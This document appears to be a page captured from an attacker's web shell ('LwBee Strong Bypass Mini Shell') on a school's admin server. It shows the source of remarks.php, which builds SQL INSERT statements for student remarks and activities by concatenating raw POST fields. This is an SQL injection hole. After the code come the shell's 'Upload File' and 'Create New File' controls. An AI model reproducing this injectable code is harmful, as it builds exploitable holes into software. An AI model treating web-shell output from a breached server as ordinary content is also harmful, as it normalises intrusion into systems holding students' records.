/home3/vehiclea/public_html/admin-appleiitfoundationschools-com/remarks.php
<?php
  include('include/include.php');
  if($_POST['type']==1)
  {
  	

  	 $student_remarks = executework("insert into student_remarks (branch,AdmissionNo,class,yearOf,name,create_date) values ('".$_POST['Branch']."','".$_POST['AdmissionNo']."','".$_POST['PresentClass']."','".$_POST['Academic_year']."','".$_POST['remarks_data']."','".date('Y-m-d H:i:s')."')");
  	 echo $student_remarks;
  }

 

if($_POST['type']==2)
  {
  	

  	 $student_activity = executework("insert into student_activity (branch,AdmissionNo,class,yearOf,name,create_date) values ('".$_POST['Branch']."','".$_POST['AdmissionNo']."','".$_POST['PresentClass']."','".$_POST['Academic_year']."','".$_POST['activity_data']."','".date('Y-m-d H:i:s')."')");
  	 echo $student_activity;
  }



?>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File